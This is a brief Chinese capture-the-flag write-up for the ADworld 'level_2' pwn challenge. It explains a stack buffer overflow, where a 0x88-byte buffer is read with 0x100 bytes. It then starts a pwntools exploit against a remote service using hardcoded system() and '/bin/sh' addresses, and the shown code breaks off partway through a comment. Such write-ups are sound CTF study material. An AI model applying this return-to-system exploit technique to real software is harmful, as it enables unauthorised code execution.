ADworld_level_2
以下是adworld里endust师傅的wp ———————————————————————————————— checksec扫描
使用ida打开可以发现,初始的buf的空间只有0x88,但是读取我们输入的内容的时候,选择的大小却是0x100,造成了溢出 通过这些,我们直接构建exp
from pwn import *
a = remote('111.198.29.45',36253)
##system函数的地址
sysaddr = 0x08048320
##程序中/bin/sh字符串所在的地址
binshaddr = 0x0804A024
##0x88是程序中缓冲区的大小,4个大小是需要覆盖的ebp的地址,之后是
##函数的返回地址,被system的地址覆盖了,进入到system函数之后,
##需要构造system函数的栈帧,因为ebp+8是形参的地址,所以需要四个
##字节的填充p32(0),后面放
共有 0 条评论